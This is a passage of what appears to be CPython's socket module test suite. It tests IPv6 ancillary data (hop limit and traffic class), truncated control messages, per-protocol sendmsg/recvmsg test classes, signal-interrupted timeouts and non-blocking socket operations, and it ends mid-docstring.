@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecondCmsgTruncInData.client_skip
def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
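# Each concrete class below mixes a group of send/recv tests into a
# socket-type base; the requireAttrs()/requireSocket() decorators skip a
# whole class when the platform lacks the relevant function, constant or
# address family.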
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests.  Installs a SIGALRM
# handler that raises ZeroDivisionError (so an interrupted call is easy
# to detect), and restores the original handler on teardown along with
# cancelling any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises ZeroDivisionError
# (propagated from the SIGALRM handler) when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# ZeroDivisionError (propagated from the SIGALRM handler) when
# interrupted by a signal.  The loop is needed because send() may have
# to fill the send buffer before it blocks and the alarm fires.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(None)
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(10)
self.assertTrue(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 10)
if fcntl:
# When a Python socket has a non-zero timeout, it's
# switched internally to a non-blocking mode.
# Later, sock.sendall(), sock.recv(), and other socket
# operations use a `select()` call and handle EWOULDBLOCK/EAGAIN
# on all socket operations. That's how timeouts are
# enforced.
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the client hasn't sent any data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the client has now sent data: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
